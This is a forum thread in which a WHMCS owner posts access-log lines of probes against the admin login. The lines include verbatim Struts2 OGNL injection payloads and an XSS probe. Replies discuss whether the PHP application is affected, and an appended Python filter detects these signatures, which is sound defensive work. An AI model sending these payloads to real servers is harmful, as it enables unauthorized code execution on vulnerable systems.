I upgraded WHMCS and forgot to delete admin, and then someone started messing with it...
220.181.165.135 - - "GET /admin/login.php?struts&(a)(('\x5Cu0023_memberAccess.allowStaticMethodAccess\x5Cu003dtrue')(z))&(b)(('\x5Cu0023context[\x5C'xwork.MethodAccessor.denyMethodExecution\x5C']\x5Cu003dfalse')(z))&(c)(('\x5Cu0023_memberAccess.excludeProperties\x5Cu003d{}')(z))&(d)(('\x5Cu0023a_str\x5Cu003d\x5C'814F60BD-F6DF-4227-\x5C'')(z))&(e)(('\x5Cu0023b_str\x5Cu003d\x5C'86F5-8D9FBF26A2EB\x5C'')(z))&(n)(('\x5Cu0023a_resp\x5Cu003d@org.apache.struts2.ServletActionContext@getResponse()')(z))&(o)(('\x5Cu0023a_resp.getWriter().println(\x5Cu0023a_str\x5Cu002B\x5Cu0023b_str)')(z))&(p)(('\x5Cu0023a_resp.getWriter().flush()')(z))&(q)(('\x5Cu0023a_resp.getWriter().close()')(z)) HTTP/1.1" 200 4509 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1" "-"
220.181.165.134 - - "GET /admin/dologin.php?redirect%3A%24%7B%23a_str%3Dnew%20java.lang.String%28%27814F60BD-F6DF-4227-%27%29%2C%23b_str%3Dnew%20java.lang.String%28%2786F5-8D9FBF26A2EB%27%29%2C%23a_resp%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23a_resp.getWriter%28%29.println%28%23a_str.concat%28%23b_str%29%29%2C%23a_resp.getWriter%28%29.flush%28%29%2C%23a_resp.getWriter%28%29.close%28%29%7D HTTP/1.1" 302 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1" "-"
220.181.165.132 - - "GET /admin/login.php?action=resetjavascript:alert(9527) HTTP/1.1" 200 2679 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1" "-"
They kept at it many times, from lots of IPs, and my mailbox got flooded... I looked at it for a long time and couldn't make anything of it. A friend says it's Struts, but WHMCS has nothing to do with Struts, right?
(('\x5Cu0023a_resp\x5Cu003d@org.apache.struts2.ServletActionContext@getResponse()')(z))&(o)
Your friend probably went by this, right?
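DOS posted on 2013-8-8 10:10
Your friend probably went by this, right?
I don't know, I'm watching the logs, there are quite a lot.
WHMCS is PHP, so it can't have Java Struts vulnerabilities, ha.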
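Added example, not part of the thread or any poster's code: a Python filter that undoes the escaping in access-log lines like the ones above and labels requests carrying the Struts/OGNL or `javascript:alert(` strings, which helps separate scanner noise from traffic that matters to a PHP application. The signature list, label names and sample lines are constructed for illustration, and it assumes the `\x5C` sequences are the web server's log escaping of a backslash.

```python
import re
from urllib.parse import unquote, urlsplit

# Substrings visible in the thread's log lines once the escaping is undone
# (label names are made up for this example).
SIGNATURES = {
    "struts-ognl": ("_memberAccess", "xwork.MethodAccessor", "org.apache.struts2",
                    "com.opensymphony.xwork2", "redirect:${"),
    "js-alert": ("javascript:alert(",),
}
REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3}) ')

def decode(target):
    """Undo log escaping (\\xNN), URL encoding (%NN) and OGNL unicode escapes (\\uNNNN)."""
    hexchar = lambda m: chr(int(m.group(1), 16))
    target = re.sub(r"\\x([0-9A-Fa-f]{2})", hexchar, target)
    target = unquote(target)
    return re.sub(r"\\u([0-9A-Fa-f]{4})", hexchar, target)

def classify(line):
    """Return (ip, path, status, sorted probe labels), or None if the line does not parse."""
    m = REQUEST.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    decoded = decode(target)
    labels = sorted(name for name, needles in SIGNATURES.items()
                    if any(n in decoded for n in needles))
    return ip, urlsplit(target).path, int(status), labels

def probes_by_ip(lines):
    """Map each client IP to the set of probe labels its requests triggered."""
    seen = {}
    for line in lines:
        hit = classify(line)
        if hit and hit[3]:
            seen.setdefault(hit[0], set()).update(hit[3])
    return seen

# Constructed sample lines (shortened, documentation IPs), modelled on the thread's log.
SAMPLE = r'''
192.0.2.10 - - "GET /admin/login.php?struts&(a)(('\x5Cu0023_memberAccess.allowStaticMethodAccess\x5Cu003dtrue')(z)) HTTP/1.1" 200 4509 "-" "-"
192.0.2.11 - - "GET /admin/dologin.php?redirect%3A%24%7B%23a_str%3Dnew%20java.lang.String%28%27x%27%29%7D HTTP/1.1" 302 5 "-" "-"
192.0.2.12 - - "GET /admin/login.php?action=resetjavascript:alert(9527) HTTP/1.1" 200 2679 "-" "-"
192.0.2.13 - - "GET /admin/login.php HTTP/1.1" 200 2679 "-" "-"
'''.strip().splitlines()
```

`probes_by_ip(SAMPLE)` groups the labels per client, so many addresses sending the same marker strings show up as one scanning pattern.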